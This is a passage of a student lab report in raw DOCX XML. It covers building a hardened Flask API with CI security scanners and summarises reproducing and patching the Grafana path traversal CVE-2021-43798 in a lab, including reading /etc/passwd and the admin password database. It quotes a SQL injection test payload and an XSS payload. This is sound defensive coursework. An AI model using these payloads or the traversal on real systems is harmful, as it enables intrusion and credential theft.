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444444"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HDU - Information Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Laboratory Work No. 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Variant: CVE-2021-43798</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4816"/>
        <w:gridCol w:w="4816"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Student:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Wu Yiye</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>HDU number:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>23320225</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Variant:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>CVE-2021-43798</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>19 October 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>1. Purpose of the work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>2. Summary of the result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3. API design and implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>4. Implemented security measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>5. CI/CD pipeline with security scanners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>6. Testing and verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>7. CVE-2021-43798: reproduction and remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>9. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A. Answers to the control questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Purpose of the work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The purpose of this work is to gain practical experience in both building a secure backend application with automated vulnerability checking and analysing and remediating a real-world vulnerability in a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The work covers the full security lifecycle: designing protection against the OWASP Top 10, integrating security tools into CI/CD, reproducing a known CVE, identifying its root cause, applying a fix and verifying that the fix works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Summary of the result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A REST API was implemented in Python with Flask. It exposes authentication, a protected data endpoint and a protected write endpoint, stores its data in SQLite and protects itself against SQL injection, cross-site scripting and broken authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The project is checked automatically on every push by a GitHub Actions pipeline that runs the unit test suite, a static analyser (bandit, SAST) and a dependency scanner (pip-audit, SCA). The pipeline passes: 16 tests, no SAST findings and no known vulnerable dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>For the CVE part, CVE-2021-43798 (path traversal in Grafana 8.x) was reproduced in the provided Vulhub environment. The vulnerability was used to read /etc/passwd and to download the Grafana database, which contains the administrator password hash. The environment was then upgraded to Grafana 8.3.1 and the same attacks were shown to fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. API design and implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Technology stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Python 3.12 and Flask 3.1 were chosen because they give a small, readable code base in which every security control can be inspected directly. The project uses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Flask 3.1 - web framework and routing;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>PyJWT 2.x - issuing and verifying JSON Web Tokens (HS256);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>bcrypt 4.x - password hashing with a per-password salt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SQLite (standard library sqlite3) - data storage;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>pytest - automated tests; bandit and pip-audit - CI security scanners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The assignment requires three methods; the third one was chosen to be a write endpoint owned by the authenticated user.</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134"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accepts a login and a password, returns a JWT access token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/api/data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bearer JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Returns the list of posts together with their authors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/api/posts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bearer JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Creates a post owned by the authenticated user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Liveness probe used by the pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Login request and response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -X POST http://127.0.0.1:5000/auth/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">     -H 'Content-Type: application/json' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">     -d '{"username":"alice","password":"Alice-Strong-Pass-2026"}'</w:t>
        <w:br/>
        <w:br/>
        <w:t>{"access_token": "eyJhbGciOiJIUzI1NiIs...", "token_type": "Bearer"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Project structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>secure-api/</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    __init__.py     application factory, security headers, error handlers</w:t>
        <w:br/>
        <w:t xml:space="preserve">    auth.py         JWT middleware and the login rate limiter</w:t>
        <w:br/>
        <w:t xml:space="preserve">    db.py           SQLite access, schema, CLI commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">    routes.py       /auth/login, /api/data, /api/posts</w:t>
        <w:br/>
        <w:t xml:space="preserve">    security.py     bcrypt, JWT, escaping, password policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cve/CVE-2021-43798/ fixed docker-compose.yml for the vulnerable environment</w:t>
        <w:br/>
        <w:t xml:space="preserve">  docs/               evidence log and screenshots</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tests/              16 functional and security regression tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .github/workflows/ci.yml</w:t>
        <w:br/>
        <w:t xml:space="preserve">  run.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Implemented security measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Protection against SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every SQL statement is executed through a parameterised query: the statement text is a constant and the user input is passed as a separate tuple, for example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>db.execute("SELECT id, username, password_hash, role FROM users WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">           (username,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>String concatenation, f-strings and % formatting are never used to build SQL, so a payload such as alice' OR '1'='1' -- is treated as an ordinary string. This is additionally checked by an automated test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Protection against cross-site scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Data is stored as it was received and escaped on output. Every user-controlled field (title, body, author) passes through markupsafe.escape before it is serialised into the JSON response, so &lt;script&gt; becomes &amp;lt;script&amp;gt;. The response also carries a restrictive Content-Security-Policy (default-src 'none'), X-Content-Type-Options: nosniff and X-Frame-Options: DENY.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Authentication and password storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Passwords are hashed with bcrypt (work factor 12) and verified with bcrypt.checkpw; plaintext passwords are never stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>A successful login issues a JWT (HS256) containing sub, username, role, iat and exp; the lifetime is 60 minutes and is configurable through JWT_EXPIRES_MINUTES.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The middleware verifies the signature, the expiry and the algorithm list (algorithms=['HS256']), so a token with alg: none is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Unknown user and wrong password return the same 401 response, which prevents user enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Five failed attempts per IP per minute are rejected with 429 (simple in-memory limiter).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The signing key is read from the SECRET_KEY environment variable, not from the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Additional hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The application limits request bodies to 64 KB, validates the type and length of every field (422 on oversized input), returns generic error pages without stack traces, and sends Cache-Control: no-store on every response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Security regression tests</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4816"/>
        <w:gridCol w:w="4816"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What it proves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_sql_injection_in_login_is_inert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A SQLi payload in the username returns 401 instead of authenticating</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_login_does_not_leak_user_existence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unknown user and wrong password give identical responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_data_requires_token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Protected endpoints are closed without a valid JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_data_rejects_tampered_signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A modified token fails signature verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_xss_payload_is_escaped_in_responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A stored &lt;script&gt; payload is returned HTML-escaped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_login_rate_limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The sixth attempt inside a minute is answered with 429</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>test_security_headers_present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CSP, nosniff and frame protection are set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. CI/CD pipeline with security scanners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The pipeline is defined in .github/workflows/ci.yml and is triggered on every push and every pull request. It runs on ubuntu-latest with Python 3.12 and consists of the following steps:</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color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3685"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
